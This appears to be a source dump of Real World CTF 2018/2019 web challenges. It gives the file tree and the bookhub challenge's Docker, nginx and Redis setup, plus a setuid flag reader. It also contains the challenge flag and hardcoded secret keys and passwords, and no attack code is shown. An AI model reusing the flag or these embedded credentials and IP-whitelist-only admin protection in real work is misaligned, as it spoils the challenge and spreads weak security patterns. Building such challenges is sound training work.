├── 2018 ├── bookhub │ ├── .gitignore │ ├── Dockerfile │ ├── README.md │ ├── conf │ │ ├── .env │ │ └── docker-entrypoint.sh │ ├── docker-compose.yml │ ├── flag │ │ ├── flag │ │ └── readflag.c │ ├── nginx │ │ ├── bookhub.conf │ │ └── white.list │ ├── pwnhub_6672.bsdesign │ ├── redis │ │ └── redis.conf │ ├── rsync-exclude.txt │ └── src │ │ ├── .gitignore │ │ ├── app.py │ │ ├── bookhub │ │ ├── __init__.py │ │ ├── commands.py │ │ ├── forms │ │ │ ├── __init__.py │ │ │ ├── book.py │ │ │ └── user.py │ │ ├── helper.py │ │ ├── models │ │ │ ├── __init__.py │ │ │ ├── book.py │ │ │ └── user.py │ │ ├── static │ │ │ └── css │ │ │ │ └── login.css │ │ ├── templates │ │ │ ├── _base.html │ │ │ ├── _form.html │ │ │ ├── _pagination.html │ │ │ ├── add.html │ │ │ ├── admin.html │ │ │ ├── edit.html │ │ │ ├── error.html │ │ │ ├── index.html │ │ │ ├── login.html │ │ │ └── system.html │ │ └── views │ │ │ ├── __init__.py │ │ │ ├── book.py │ │ │ └── user.py │ │ ├── migrations │ │ ├── README │ │ ├── alembic.ini │ │ ├── env.py │ │ ├── script.py.mako │ │ └── versions │ │ │ ├── b6eb51473869_.py │ │ │ └── bd31dc4168e1_.py │ │ └── requirements.txt └── magic_tunnel │ ├── .dockerignore │ ├── .gitignore │ ├── Dockerfile │ ├── README.md │ ├── code │ ├── Pipfile │ ├── Pipfile.lock │ └── rwctf │ │ ├── .gitignore │ │ ├── manage.py │ │ ├── rwctf │ │ ├── __init__.py │ │ ├── settings.py │ │ ├── urls.py │ │ └── wsgi.py │ │ ├── server.sh │ │ └── xremote │ │ ├── __init__.py │ │ ├── admin.py │ │ ├── apps.py │ │ ├── forms.py │ │ ├── migrations │ │ ├── 0001_initial.py │ │ └── __init__.py │ │ ├── models.py │ │ ├── templates │ │ └── index.html │ │ ├── tests.py │ │ ├── urls.py │ │ └── views.py │ ├── docker-compose.yml │ ├── files │ ├── media │ │ └── .gitkeep │ └── static │ │ └── .gitkeep │ ├── flag │ ├── flag │ └── readflag.c │ ├── nginx │ └── rwctf.conf │ └── requirements.txt ├── 2019 └── crawlbox │ ├── .gitignore │ ├── Dockerfile │ ├── README.md │ ├── docker-compose.yml │ ├── docker │ ├── chromedriver.sh │ ├── control.py │ ├── flag_uBd20U0zp1uk │ ├── flask.sh │ ├── nginx-www.conf │ ├── redis.conf │ ├── scrapyd.conf │ └── scrapyd.sh │ ├── requirements.txt │ ├── web │ ├── app.py │ └── templates │ │ └── index.html │ └── webpage │ ├── scrapy.cfg │ ├── setup.py │ └── webpage │ ├── __init__.py │ ├── items.py │ ├── middlewares.py │ ├── pipelines.py │ ├── settings.py │ └── spiders │ ├── __init__.py │ └── page.py └── README.md /2018/bookhub/.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__ 2 | *.pyc 3 | /.idea/ -------------------------------------------------------------------------------- /2018/bookhub/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.6 2 | 3 | LABEL maintainer="phith0n " 4 | 5 | COPY src/requirements.txt /tmp/requirements.txt 6 | COPY ./conf/docker-entrypoint.sh /docker-entrypoint.sh 7 | COPY flag/readflag.c /tmp/readflag.c 8 | 9 | RUN set -ex \ 10 | && pip install -U -r /tmp/requirements.txt \ 11 | && mkdir /data \ 12 | && gcc /tmp/readflag.c -o /readflag \ 13 | && chmod +x /docker-entrypoint.sh \ 14 | && rm -rf /tmp/requirements.txt /tmp/readflag.c 15 | 16 | ENTRYPOINT [ "/docker-entrypoint.sh" ] 17 | WORKDIR /usr/src 18 | EXPOSE 5000 19 | 20 | COPY flag/flag /flag 21 | RUN chown root:root /readflag \ 22 | && chmod 755 /readflag \ 23 | && chmod u+s /readflag \ 24 | && chown root:root /flag \ 25 | && chmod 400 /flag 26 | 27 | CMD ["gunicorn", "-w", "4", "-b", "0.0.0.0:5000", "-u", "nobody", "-g", "nogroup", "-k", "gevent", "--chdir", "/usr/src", "app:app"] -------------------------------------------------------------------------------- /2018/bookhub/README.md: -------------------------------------------------------------------------------- 1 | # Real World CTF 2018 Quals - Bookhub 2 | 3 | This is my first challenge for the Real World CTF 2018. 4 | -------------------------------------------------------------------------------- /2018/bookhub/conf/.env: -------------------------------------------------------------------------------- 1 | SECRET_KEY=fu629E4cqD23dfkUQrCHm55977cDbwr3zfU3 2 | LC_ALL=C.UTF-8 3 | LANG=C.UTF-8 4 | FLASK_APP=app.py 5 | FLASK_DEBUG=0 6 | DATABASE_URL=sqlite:////data/db.sqlite3 7 | WHITELIST_IPADDRESS=10.0.0.0/8,127.0.0.0/8,172.16.0.0/12,192.168.0.0/16 8 | REDIS_URL=redis://:49n2ezurWRDF@redis:6388/0 9 | -------------------------------------------------------------------------------- /2018/bookhub/conf/docker-entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | set -e 3 | 4 | if [ ! -e /data/db.sqlite3 ]; then 5 | flask db upgrade 6 | chown nobody:nogroup /data/db.sqlite3 7 | fi 8 | 9 | exec "$@" -------------------------------------------------------------------------------- /2018/bookhub/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | services: 3 | redis: 4 | image: redis:4 5 | command: redis-server /etc/redis/redis.conf 6 | volumes: 7 | - ./redis/redis.conf:/etc/redis/redis.conf 8 | web: 9 | build: . 10 | volumes: 11 | - ./src:/usr/src 12 | env_file: 13 | - ./conf/.env 14 | nginx: 15 | image: nginx:1 16 | volumes: 17 | - ./nginx/bookhub.conf:/etc/nginx/conf.d/bookhub.conf 18 | - ./src/bookhub/static:/usr/share/nginx/html/static 19 | - ./nginx/white.list:/etc/nginx/white.list 20 | - ./source.zip:/usr/share/nginx/html/www.zip 21 | ports: 22 | - "8080:8080" 23 | -------------------------------------------------------------------------------- /2018/bookhub/flag/flag: -------------------------------------------------------------------------------- 1 | rwctf{fl4sk_1s_a_M4g1cal_fr4mew0rk_t0000000000} -------------------------------------------------------------------------------- /2018/bookhub/flag/readflag.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main () { 4 | FILE *fp; 5 | char buff[255]; 6 | 7 | fp = fopen("/flag", "r"); 8 | fgets(buff, 255, fp); 9 | fclose(fp); 10 | 11 | printf("flag: %s\n", buff); 12 | 13 | return 0; 14 | } -------------------------------------------------------------------------------- /2018/bookhub/nginx/bookhub.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 8080; 3 | server_name bookhub.pwnhub.cn; 4 | root /usr/share/nginx/html; 5 | 6 | location @proxy { 7 | proxy_pass http://web:5000; 8 | proxy_set_header Host $host:$server_port; 9 | proxy_set_header X-Forwarded-For $remote_addr; 10 | } 11 | 12 | location / { 13 | try_files $uri @proxy; 14 | } 15 | 16 | location ~ ^/admin { 17 | include /etc/nginx/white.list; 18 | deny all; 19 | try_files $uri @proxy; 20 | } 21 | 22 | location /static/ { 23 | expires 12h; 24 | } 25 | 26 | access_log /var/log/nginx/access.log; 27 | error_log /var/log/nginx/error.log; 28 | } -------------------------------------------------------------------------------- /2018/bookhub/nginx/white.list: -------------------------------------------------------------------------------- 1 | allow 127.0.0.1; 2 | allow 172.16.0.0/12; 3 | allow 10.0.0.0/8; 4 | allow 192.168.0.0/16; -------------------------------------------------------------------------------- /2018/bookhub/pwnhub_6672.bsdesign: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phith0n/realworldctf/6035cb32a773d28750fbadf2cdab6ac00feafa2c/2018/bookhub/pwnhub_6672.bsdesign -------------------------------------------------------------------------------- /2018/bookhub/redis/redis.conf: -------------------------------------------------------------------------------- 1 | # Redis configuration file example. 2 | # 3 | # Note that in order to read the configuration file, Redis must be 4 | # started with the file path as first argument: 5 | # 6 | # ./redis-server /path/to/redis.conf 7 | 8 | # Note on units: when memory size is needed, it is possible to specify 9 | # it in the usual form of 1k 5GB 4M and so forth: 10 | # 11 | # 1k => 1000 bytes 12 | # 1kb => 1024 bytes 13 | # 1m => 1000000 bytes 14 | # 1mb => 1024*1024 bytes 15 | # 1g => 1000000000 bytes 16 | # 1gb => 1024*1024*1024 bytes 17 | # 18 | # units are case insensitive so 1GB 1Gb 1gB are all the same. 19 | 20 | ################################## INCLUDES ################################### 21 | 22 | # Include one or more other config files here. This is useful if you 23 | # have a standard template that goes to all Redis servers but also need 24 | # to customize a few per-server settings. Include files can include 25 | # other files, so use this wisely. 26 | # 27 | # Notice option "include" won't be rewritten by command "CONFIG REWRITE" 28 | # from admin or Redis Sentinel. Since Redis always uses the last processed 29 | # line as value of a configuration directive, you'd better put includes 30 | # at the beginning of this file to avoid overwriting config change at runtime. 31 | # 32 | # If instead you are interested in using includes to override configuration 33 | # options, it is better to use include as the last line. 34 | # 35 | # include /path/to/local.conf 36 | # include /path/to/other.conf 37 | 38 | ################################## MODULES ##################################### 39 | 40 | # Load modules at startup. If the server is not able to load modules 41 | # it will abort. It is possible to use multiple loadmodule directives. 42 | # 43 | # loadmodule /path/to/my_module.so 44 | # loadmodule /path/to/other_module.so 45 | 46 | ################################## NETWORK ##################################### 47 | 48 | # By default, if no "bind" configuration directive is specified, Redis listens 49 | # for connections from all the network interfaces available on the server. 50 | # It is possible to listen to just one or multiple selected interfaces using 51 | # the "bind" configuration directive, followed by one or more IP addresses. 52 | # 53 | # Examples: 54 | # 55 | # bind 192.168.1.100 10.0.0.1 56 | # bind 127.0.0.1 ::1 57 | # 58 | # ~~~ WARNING ~~~ If the computer running Redis is directly exposed to the 59 | # internet, binding to all the interfaces is dangerous and will expose the 60 | # instance to everybody on the internet. So by default we uncomment the 61 | # following bind directive, that will force Redis to listen only into 62 | # the IPv4 lookback interface address (this means Redis will be able to 63 | # accept connections only from clients running into the same computer it 64 | # is running). 65 | # 66 | # IF YOU ARE SURE YOU WANT YOUR INSTANCE TO LISTEN TO ALL THE INTERFACES 67 | # JUST COMMENT THE FOLLOWING LINE. 68 | # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 69 | bind 0.0.0.0 70 | 71 | # Protected mode is a layer of security protection, in order to avoid that 72 | # Redis instances left open on the internet are accessed and exploited. 73 | # 74 | # When protected mode is on and if: 75 | # 76 | # 1) The server is not binding explicitly to a set of addresses using the 77 | # "bind" directive. 78 | # 2) No password is configured. 79 | # 80 | # The server only accepts connections from clients connecting from the 81 | # IPv4 and IPv6 loopback addresses 127.0.0.1 and ::1, and from Unix domain 82 | # sockets. 83 | # 84 | # By default protected mode is enabled. You should disable it only if 85 | # you are sure you want clients from other hosts to connect to Redis 86 | # even if no authentication is configured, nor a specific set of interfaces 87 | # are explicitly listed using the "bind" directive. 88 | protected-mode yes 89 | 90 | # Accept connections on the specified port, default is 6379 (IANA #815344). 91 | # If port 0 is specified Redis will not listen on a TCP socket. 92 | port 6388 93 | 94 | # TCP listen() backlog. 95 | # 96 | # In high requests-per-second environments you need an high backlog in order 97 | # to avoid slow clients connections issues. Note that the Linux kernel 98 | # will silently truncate it to the value of /proc/sys/net/core/somaxconn so 99 | # make sure to raise both the value of somaxconn and tcp_max_syn_backlog 100 | # in order to get the desired effect. 101 | tcp-backlog 511 102 | 103 | # Unix socket. 104 | # 105 | # Specify the path for the Unix socket that will be used to listen for 106 | # incoming connections. There is no default, so Redis will not listen 107 | # on a unix socket when not specified. 108 | # 109 | # unixsocket /tmp/redis.sock 110 | # unixsocketperm 700 111 | 112 | # Close the connection after a client is idle for N seconds (0 to disable) 113 | timeout 0 114 | 115 | # TCP keepalive. 116 | # 117 | # If non-zero, use SO_KEEPALIVE to send TCP ACKs to clients in absence 118 | # of communication. This is useful for two reasons: 119 | # 120 | # 1) Detect dead peers. 121 | # 2) Take the connection alive from the point of view of network 122 | # equipment in the middle. 123 | # 124 | # On Linux, the specified value (in seconds) is the period used to send ACKs. 125 | # Note that to close the connection the double of the time is needed. 126 | # On other kernels the period depends on the kernel configuration. 127 | # 128 | # A reasonable value for this option is 300 seconds, which is the new 129 | # Redis default starting with Redis 3.2.1. 130 | tcp-keepalive 300 131 | 132 | ################################# GENERAL ##################################### 133 | 134 | # By default Redis does not run as a daemon. Use 'yes' if you need it. 135 | # Note that Redis will write a pid file in /var/run/redis.pid when daemonized. 136 | daemonize no 137 | 138 | # If you run Redis from upstart or systemd, Redis can interact with your 139 | # supervision tree. Options: 140 | # supervised no - no supervision interaction 141 | # supervised upstart - signal upstart by putting Redis into SIGSTOP mode 142 | # supervised systemd - signal systemd by writing READY=1 to $NOTIFY_SOCKET 143 | # supervised auto - detect upstart or systemd method based on 144 | # UPSTART_JOB or NOTIFY_SOCKET environment variables 145 | # Note: these supervision methods only signal "process is ready." 146 | # They do not enable continuous liveness pings back to your supervisor. 147 | supervised no 148 | 149 | # If a pid file is specified, Redis writes it where specified at startup 150 | # and removes it at exit. 151 | # 152 | # When the server runs non daemonized, no pid file is created if none is 153 | # specified in the configuration. When the server is daemonized, the pid file 154 | # is used even if not specified, defaulting to "/var/run/redis.pid". 155 | # 156 | # Creating a pid file is best effort: if Redis is not able to create it 157 | # nothing bad happens, the server will start and run normally. 158 | pidfile /var/run/redis_6379.pid 159 | 160 | # Specify the server verbosity level. 161 | # This can be one of: 162 | # debug (a lot of information, useful for development/testing) 163 | # verbose (many rarely useful info, but not a mess like the debug level) 164 | # notice (moderately verbose, what you want in production probably) 165 | # warning (only very important / critical messages are logged) 166 | loglevel notice 167 | 168 | # Specify the log file name. Also the empty string can be used to force 169 | # Redis to log on the standard output. Note that if you use standard 170 | # output for logging but daemonize, logs will be sent to /dev/null 171 | logfile "" 172 | 173 | # To enable logging to the system logger, just set 'syslog-enabled' to yes, 174 | # and optionally update the other syslog parameters to suit your needs. 175 | # syslog-enabled no 176 | 177 | # Specify the syslog identity. 178 | # syslog-ident redis 179 | 180 | # Specify the syslog facility. Must be USER or between LOCAL0-LOCAL7. 181 | # syslog-facility local0 182 | 183 | # Set the number of databases. The default database is DB 0, you can select 184 | # a different one on a per-connection basis using SELECT where 185 | # dbid is a number between 0 and 'databases'-1 186 | databases 16 187 | 188 | # By default Redis shows an ASCII art logo only when started to log to the 189 | # standard output and if the standard output is a TTY. Basically this means 190 | # that normally a logo is displayed only in interactive sessions. 191 | # 192 | # However it is possible to force the pre-4.0 behavior and always show a 193 | # ASCII art logo in startup logs by setting the following option to yes. 194 | always-show-logo yes 195 | 196 | ################################ SNAPSHOTTING ################################ 197 | # 198 | # Save the DB on disk: 199 | # 200 | # save 201 | # 202 | # Will save the DB if both the given number of seconds and the given 203 | # number of write operations against the DB occurred. 204 | # 205 | # In the example below the behaviour will be to save: 206 | # after 900 sec (15 min) if at least 1 key changed 207 | # after 300 sec (5 min) if at least 10 keys changed 208 | # after 60 sec if at least 10000 keys changed 209 | # 210 | # Note: you can disable saving completely by commenting out all "save" lines. 211 | # 212 | # It is also possible to remove all the previously configured save 213 | # points by adding a save directive with a single empty string argument 214 | # like in the following example: 215 | # 216 | # save "" 217 | 218 | save 900 1 219 | save 300 10 220 | save 60 10000 221 | 222 | # By default Redis will stop accepting writes if RDB snapshots are enabled 223 | # (at least one save point) and the latest background save failed. 224 | # This will make the user aware (in a hard way) that data is not persisting 225 | # on disk properly, otherwise chances are that no one will notice and some 226 | # disaster will happen. 227 | # 228 | # If the background saving process will start working again Redis will 229 | # automatically allow writes again. 230 | # 231 | # However if you have setup your proper monitoring of the Redis server 232 | # and persistence, you may want to disable this feature so that Redis will 233 | # continue to work as usual even if there are problems with disk, 234 | # permissions, and so forth. 235 | stop-writes-on-bgsave-error yes 236 | 237 | # Compress string objects using LZF when dump .rdb databases? 238 | # For default that's set to 'yes' as it's almost always a win. 239 | # If you want to save some CPU in the saving child set it to 'no' but 240 | # the dataset will likely be bigger if you have compressible values or keys. 241 | rdbcompression yes 242 | 243 | # Since version 5 of RDB a CRC64 checksum is placed at the end of the file. 244 | # This makes the format more resistant to corruption but there is a performance 245 | # hit to pay (around 10%) when saving and loading RDB files, so you can disable it 246 | # for maximum performances. 247 | # 248 | # RDB files created with checksum disabled have a checksum of zero that will 249 | # tell the loading code to skip the check. 250 | rdbchecksum yes 251 | 252 | # The filename where to dump the DB 253 | dbfilename dump.rdb 254 | 255 | # The working directory. 256 | # 257 | # The DB will be written inside this directory, with the filename specified 258 | # above using the 'dbfilename' configuration directive. 259 | # 260 | # The Append Only File will also be created inside this directory. 261 | # 262 | # Note that you must specify a directory here, not a file name. 263 | dir ./ 264 | 265 | ################################# REPLICATION ################################# 266 | 267 | # Master-Slave replication. Use slaveof to make a Redis instance a copy of 268 | # another Redis server. A few things to understand ASAP about Redis replication. 269 | # 270 | # 1) Redis replication is asynchronous, but you can configure a master to 271 | # stop accepting writes if it appears to be not connected with at least 272 | # a given number of slaves. 273 | # 2) Redis slaves are able to perform a partial resynchronization with the 274 | # master if the replication link is lost for a relatively small amount of 275 | # time. You may want to configure the replication backlog size (see the next 276 | # sections of this file) with a sensible value depending on your needs. 277 | # 3) Replication is automatic and does not need user intervention. After a 278 | # network partition slaves automatically try to reconnect to masters 279 | # and resynchronize with them. 280 | # 281 | # slaveof 282 | 283 | # If the master is password protected (using the "requirepass" configuration 284 | # directive below) it is possible to tell the slave to authenticate before 285 | # starting the replication synchronization process, otherwise the master will 286 | # refuse the slave request. 287 | # 288 | # masterauth 289 | 290 | # When a slave loses its connection with the master, or when the replication 291 | # is still in progress, the slave can act in two different ways: 292 | # 293 | # 1) if slave-serve-stale-data is set to 'yes' (the default) the slave will 294 | # still reply to client requests, possibly with out of date data, or the 295 | # data set may just be empty if this is the first synchronization. 296 | # 297 | # 2) if slave-serve-stale-data is set to 'no' the slave will reply with 298 | # an error "SYNC with master in progress" to all the kind of commands 299 | # but to INFO and SLAVEOF. 300 | # 301 | slave-serve-stale-data yes 302 | 303 | # You can configure a slave instance to accept writes or not. Writing against 304 | # a slave instance may be useful to store some ephemeral data (because data 305 | # written on a slave will be easily deleted after resync with the master) but 306 | # may also cause problems if clients are writing to it because of a 307 | # misconfiguration. 308 | # 309 | # Since Redis 2.6 by default slaves are read-only. 310 | # 311 | # Note: read only slaves are not designed to be exposed to untrusted clients 312 | # on the internet. It's just a protection layer against misuse of the instance. 313 | # Still a read only slave exports by default all the administrative commands 314 | # such as CONFIG, DEBUG, and so forth. To a limited extent you can improve 315 | # security of read only slaves using 'rename-command' to shadow all the 316 | # administrative / dangerous commands. 317 | slave-read-only yes 318 | 319 | # Replication SYNC strategy: disk or socket. 320 | # 321 | # ------------------------------------------------------- 322 | # WARNING: DISKLESS REPLICATION IS EXPERIMENTAL CURRENTLY 323 | # ------------------------------------------------------- 324 | # 325 | # New slaves and reconnecting slaves that are not able to continue the replication 326 | # process just receiving differences, need to do what is called a "full 327 | # synchronization". An RDB file is transmitted from the master to the slaves. 328 | # The transmission can happen in two different ways: 329 | # 330 | # 1) Disk-backed: The Redis master creates a new process that writes the RDB 331 | # file on disk. Later the file is transferred by the parent 332 | # process to the slaves incrementally. 333 | # 2) Diskless: The Redis master creates a new process that directly writes the 334 | # RDB file to slave sockets, without touching the disk at all. 335 | # 336 | # With disk-backed replication, while the RDB file is generated, more slaves 337 | # can be queued and served with the RDB file as soon as the current child producing 338 | # the RDB file finishes its work. With diskless replication instead once 339 | # the transfer starts, new slaves arriving will be queued and a new transfer 340 | # will start when the current one terminates. 341 | # 342 | # When diskless replication is used, the master waits a configurable amount of 343 | # time (in seconds) before starting the transfer in the hope that multiple slaves 344 | # will arrive and the transfer can be parallelized. 345 | # 346 | # With slow disks and fast (large bandwidth) networks, diskless replication 347 | # works better. 348 | repl-diskless-sync no 349 | 350 | # When diskless replication is enabled, it is possible to configure the delay 351 | # the server waits in order to spawn the child that transfers the RDB via socket 352 | # to the slaves. 353 | # 354 | # This is important since once the transfer starts, it is not possible to serve 355 | # new slaves arriving, that will be queued for the next RDB transfer, so the server 356 | # waits a delay in order to let more slaves arrive. 357 | # 358 | # The delay is specified in seconds, and by default is 5 seconds. To disable 359 | # it entirely just set it to 0 seconds and the transfer will start ASAP. 360 | repl-diskless-sync-delay 5 361 | 362 | # Slaves send PINGs to server in a predefined interval. It's possible to change 363 | # this interval with the repl_ping_slave_period option. The default value is 10 364 | # seconds. 365 | # 366 | # repl-ping-slave-period 10 367 | 368 | # The following option sets the replication timeout for: 369 | # 370 | # 1) Bulk transfer I/O during SYNC, from the point of view of slave. 371 | # 2) Master timeout from the point of view of slaves (data, pings). 372 | # 3) Slave timeout from the point of view of masters (REPLCONF ACK pings). 373 | # 374 | # It is important to make sure that this value is greater than the value 375 | # specified for repl-ping-slave-period otherwise a timeout will be detected 376 | # every time there is low traffic between the master and the slave. 377 | # 378 | # repl-timeout 60 379 | 380 | # Disable TCP_NODELAY on the slave socket after SYNC? 381 | # 382 | # If you select "yes" Redis will use a smaller number of TCP packets and 383 | # less bandwidth to send data to slaves. But this can add a delay for 384 | # the data to appear on the slave side, up to 40 milliseconds with 385 | # Linux kernels using a default configuration. 386 | # 387 | # If you select "no" the delay for data to appear on the slave side will 388 | # be reduced but more bandwidth will be used for replication. 389 | # 390 | # By default we optimize for low latency, but in very high traffic conditions 391 | # or when the master and slaves are many hops away, turning this to "yes" may 392 | # be a good idea. 393 | repl-disable-tcp-nodelay no 394 | 395 | # Set the replication backlog size. The backlog is a buffer that accumulates 396 | # slave data when slaves are disconnected for some time, so that when a slave 397 | # wants to reconnect again, often a full resync is not needed, but a partial 398 | # resync is enough, just passing the portion of data the slave missed while 399 | # disconnected. 400 | # 401 | # The bigger the replication backlog, the longer the time the slave can be 402 | # disconnected and later be able to perform a partial resynchronization. 403 | # 404 | # The backlog is only allocated once there is at least a slave connected. 405 | # 406 | # repl-backlog-size 1mb 407 | 408 | # After a master has no longer connected slaves for some time, the backlog 409 | # will be freed. The following option configures the amount of seconds that 410 | # need to elapse, starting from the time the last slave disconnected, for 411 | # the backlog buffer to be freed. 412 | # 413 | # Note that slaves never free the backlog for timeout, since they may be 414 | # promoted to masters later, and should be able to correctly "partially 415 | # resynchronize" with the slaves: hence they should always accumulate backlog. 416 | # 417 | # A value of 0 means to never release the backlog. 418 | # 419 | # repl-backlog-ttl 3600 420 | 421 | # The slave priority is an integer number published by Redis in the INFO output. 422 | # It is used by Redis Sentinel in order to select a slave to promote into a 423 | # master if the master is no longer working correctly. 424 | # 425 | # A slave with a low priority number is considered better for promotion, so 426 | # for instance if there are three slaves with priority 10, 100, 25 Sentinel will 427 | # pick the one with priority 10, that is the lowest. 428 | # 429 | # However a special priority of 0 marks the slave as not able to perform the 430 | # role of master, so a slave with priority of 0 will never be selected by 431 | # Redis Sentinel for promotion. 432 | # 433 | # By default the priority is 100. 434 | slave-priority 100 435 | 436 | # It is possible for a master to stop accepting writes if there are less than 437 | # N slaves connected, having a lag less or equal than M seconds. 438 | # 439 | # The N slaves need to be in "online" state. 440 | # 441 | # The lag in seconds, that must be <= the specified value, is calculated from 442 | # the last ping received from the slave, that is usually sent every second. 443 | # 444 | # This option does not GUARANTEE that N replicas will accept the write, but 445 | # will limit the window of exposure for lost writes in case not enough slaves 446 | # are available, to the specified number of seconds. 447 | # 448 | # For example to require at least 3 slaves with a lag <= 10 seconds use: 449 | # 450 | # min-slaves-to-write 3 451 | # min-slaves-max-lag 10 452 | # 453 | # Setting one or the other to 0 disables the feature. 454 | # 455 | # By default min-slaves-to-write is set to 0 (feature disabled) and 456 | # min-slaves-max-lag is set to 10. 457 | 458 | # A Redis master is able to list the address and port of the attached 459 | # slaves in different ways. For example the "INFO replication" section 460 | # offers this information, which is used, among other tools, by 461 | # Redis Sentinel in order to discover slave instances. 462 | # Another place where this info is available is in the output of the 463 | # "ROLE" command of a master. 464 | # 465 | # The listed IP and address normally reported by a slave is obtained 466 | # in the following way: 467 | # 468 | # IP: The address is auto detected by checking the peer address 469 | # of the socket used by the slave to connect with the master. 470 | # 471 | # Port: The port is communicated by the slave during the replication 472 | # handshake, and is normally the port that the slave is using to 473 | # list for connections. 474 | # 475 | # However when port forwarding or Network Address Translation (NAT) is 476 | # used, the slave may be actually reachable via different IP and port 477 | # pairs. The following two options can be used by a slave in order to 478 | # report to its master a specific set of IP and port, so that both INFO 479 | # and ROLE will report those values. 480 | # 481 | # There is no need to use both the options if you need to override just 482 | # the port or the IP address. 483 | # 484 | # slave-announce-ip 5.5.5.5 485 | # slave-announce-port 1234 486 | 487 | ################################## SECURITY ################################### 488 | 489 | # Require clients to issue AUTH before processing any other 490 | # commands. This might be useful in environments in which you do not trust 491 | # others with access to the host running redis-server. 492 | # 493 | # This should stay commented out for backward compatibility and because most 494 | # people do not need auth (e.g. they run their own servers). 495 | # 496 | # Warning: since Redis is pretty fast an outside user can try up to 497 | # 150k passwords per second against a good box. This means that you should 498 | # use a very strong password otherwise it will be very easy to break. 499 | # 500 | requirepass 49n2ezurWRDF 501 | 502 | # Command renaming. 503 | # 504 | # It is possible to change the name of dangerous commands in a shared 505 | # environment. For instance the CONFIG command may be renamed into something 506 | # hard to guess so that it will still be available for internal-use tools 507 | # but not available for general clients. 508 | # 509 | # Example: 510 | # 511 | # rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52 512 | # 513 | # It is also possible to completely kill a command by renaming it into 514 | # an empty string: 515 | # 516 | # rename-command CONFIG "" 517 | # 518 | # Please note that changing the name of commands that are logged into the 519 | # AOF file or transmitted to slaves may cause problems. 520 | rename-command CONFIG "" 521 | 522 | ################################### CLIENTS #################################### 523 | 524 | # Set the max number of connected clients at the same time. By default 525 | # this limit is set to 10000 clients, however if the Redis server is not 526 | # able to configure the process file limit to allow for the specified limit 527 | # the max number of allowed clients is set to the current file limit 528 | # minus 32 (as Redis reserves a few file descriptors for internal uses). 529 | # 530 | # Once the limit is reached Redis will close all the new connections sending 531 | # an error 'max number of clients reached'. 532 | # 533 | # maxclients 10000 534 | 535 | ############################## MEMORY MANAGEMENT ################################ 536 | 537 | # Set a memory usage limit to the specified amount of bytes. 538 | # When the memory limit is reached Redis will try to remove keys 539 | # according to the eviction policy selected (see maxmemory-policy). 540 | # 541 | # If Redis can't remove keys according to the policy, or if the policy is 542 | # set to 'noeviction', Redis will start to reply with errors to commands 543 | # that would use more memory, like SET, LPUSH, and so on, and will continue 544 | # to reply to read-only commands like GET. 545 | # 546 | # This option is usually useful when using Redis as an LRU or LFU cache, or to 547 | # set a hard memory limit for an instance (using the 'noeviction' policy). 548 | # 549 | # WARNING: If you have slaves attached to an instance with maxmemory on, 550 | # the size of the output buffers needed to feed the slaves are subtracted 551 | # from the used memory count, so that network problems / resyncs will 552 | # not trigger a loop where keys are evicted, and in turn the output 553 | # buffer of slaves is full with DELs of keys evicted triggering the deletion 554 | # of more keys, and so forth until the database is completely emptied. 555 | # 556 | # In short... if you have slaves attached it is suggested that you set a lower 557 | # limit for maxmemory so that there is some free RAM on the system for slave 558 | # output buffers (but this is not needed if the policy is 'noeviction'). 559 | # 560 | # maxmemory 561 | 562 | # MAXMEMORY POLICY: how Redis will select what to remove when maxmemory 563 | # is reached. You can select among five behaviors: 564 | # 565 | # volatile-lru -> Evict using approximated LRU among the keys with an expire set. 566 | # allkeys-lru -> Evict any key using approximated LRU. 567 | # volatile-lfu -> Evict using approximated LFU among the keys with an expire set. 568 | # allkeys-lfu -> Evict any key using approximated LFU. 569 | # volatile-random -> Remove a random key among the ones with an expire set. 570 | # allkeys-random -> Remove a random key, any key. 571 | # volatile-ttl -> Remove the key with the nearest expire time (minor TTL) 572 | # noeviction -> Don't evict anything, just return an error on write operations. 573 | # 574 | # LRU means Least Recently Used 575 | # LFU means Least Frequently Used 576 | # 577 | # Both LRU, LFU and volatile-ttl are implemented using approximated 578 | # randomized algorithms. 579 | # 580 | # Note: with any of the above policies, Redis will return an error on write 581 | # operations, when there are no suitable keys for eviction. 582 | # 583 | # At the date of writing these commands are: set setnx setex append 584 | # incr decr rpush lpush rpushx lpushx linsert lset rpoplpush sadd 585 | # sinter sinterstore sunion sunionstore sdiff sdiffstore zadd zincrby 586 | # zunionstore zinterstore hset hsetnx hmset hincrby incrby decrby 587 | # getset mset msetnx exec sort 588 | # 589 | # The default is: 590 | # 591 | # maxmemory-policy noeviction 592 | 593 | # LRU, LFU and minimal TTL algorithms are not precise algorithms but approximated 594 | # algorithms (in order to save memory), so you can tune it for speed or 595 | # accuracy. For default Redis will check five keys and pick the one that was 596 | # used less recently, you can change the sample size using the following 597 | # configuration directive. 598 | # 599 | # The default of 5 produces good enough results. 10 Approximates very closely 600 | # true LRU but costs more CPU. 3 is faster but not very accurate. 601 | # 602 | # maxmemory-samples 5 603 | 604 | ############################# LAZY FREEING #################################### 605 | 606 | # Redis has two primitives to delete keys. One is called DEL and is a blocking 607 | # deletion of the object. It means that the server stops processing new commands 608 | # in order to reclaim all the memory associated with an object in a synchronous 609 | # way. If the key deleted is associated with a small object, the time needed 610 | # in order to execute the DEL command is very small and comparable to most other 611 | # O(1) or O(log_N) commands in Redis. However if the key is associated with an 612 | # aggregated value containing millions of elements, the server can block for 613 | # a long time (even seconds) in order to complete the operation. 614 | # 615 | # For the above reasons Redis also offers non blocking deletion primitives 616 | # such as UNLINK (non blocking DEL) and the ASYNC option of FLUSHALL and 617 | # FLUSHDB commands, in order to reclaim memory in background. Those commands 618 | # are executed in constant time. Another thread will incrementally free the 619 | # object in the background as fast as possible. 620 | # 621 | # DEL, UNLINK and ASYNC option of FLUSHALL and FLUSHDB are user-controlled. 622 | # It's up to the design of the application to understand when it is a good 623 | # idea to use one or the other. However the Redis server sometimes has to 624 | # delete keys or flush the whole database as a side effect of other operations. 625 | # Specifically Redis deletes objects independently of a user call in the 626 | # following scenarios: 627 | # 628 | # 1) 